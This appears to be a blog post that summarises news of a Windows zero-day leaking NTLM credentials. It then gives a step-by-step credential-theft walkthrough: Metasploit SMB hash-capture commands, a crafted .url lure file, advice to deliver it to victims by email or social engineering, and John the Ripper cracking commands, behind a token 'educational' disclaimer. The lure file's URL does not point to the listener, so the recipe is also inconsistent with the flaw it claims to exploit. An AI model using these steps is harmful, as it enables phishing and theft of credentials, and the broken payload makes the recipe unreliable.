Tag: Cybersecurity

New Windows zero-day exposes NTLM credentials

A new zero-day vulnerability has been discovered that allows attackers to capture NTLM credentials by simply tricking the target into viewing a malicious file in Windows Explorer.

The flaw was discovered by the 0patch team, a platform that provides unofficial support for end-of-life Windows versions, and was reported to Microsoft. However, no official fix has been released yet.

According to 0patch, the issue, which currently has no CVE ID, impacts all Windows versions from Windows 7 and Server 2008 R2 up to the latest Windows 11 24H2 and Server 2022.

The default port for NTLM authentication is port 445, which is primarily used for SMB (Server Message Block) communication. If this port is open and accessible, attackers can exploit NTLM credential leaks, especially in untrusted network environments. This could allow unauthorized access to sensitive systems and, when combined with other attack vectors, enable further actions such as lateral movement or establishing command-and-control (C&C) infrastructure. Therefore, securing port 445 is critical to mitigate such risks.

https://www.bleepingcomputer.com/news/security/new-windows-zero-day-exposes-ntlm-credentials-gets-unofficial-patch/

Exploit that might work. (this is for educational purpose, hacking is bad, don’t hack)

1. Set Up the Metasploit Listener

Start Metasploit:

msfconsole

Use the auxiliary module to create a malicious SMB server:

use auxiliary/server/capture/smb
set SRVHOST <your_attack_machine_IP>
set SRVPORT 445
set JOHNPWFILE /tmp/hashes.john
set CHALLENGE 1122334455667788
run

This creates an SMB server to capture NTLMv2 hashes when a Windows user connects to it.

2. Create a Malicious File

Craft a file containing a link to your SMB server. For example:

[InternetShortcut]
URL=file:///fake

Save the file as something enticing, e.g., ReadMe.url.

3. Host or Distribute the Malicious File

  • Email the malicious .url file to the victim.
  • Host it on a shared drive or external USB.
  • Use social engineering to trick the user into opening the file.

4. Capture NTLM Hashes

Monitor your Metasploit or Responder console for NTLM hash captures.

5. Crack NTLM Hashes

Use John the Ripper to crack captured hashes:

john /tmp/hashes.john --wordlist=/usr/share/wordlists/rockyou.txt

Defensive Measures:

  • Disable NTLM authentication on Windows systems.
  • Regularly apply Windows updates.
  • Use SMB signing to mitigate NTLM relay attacks.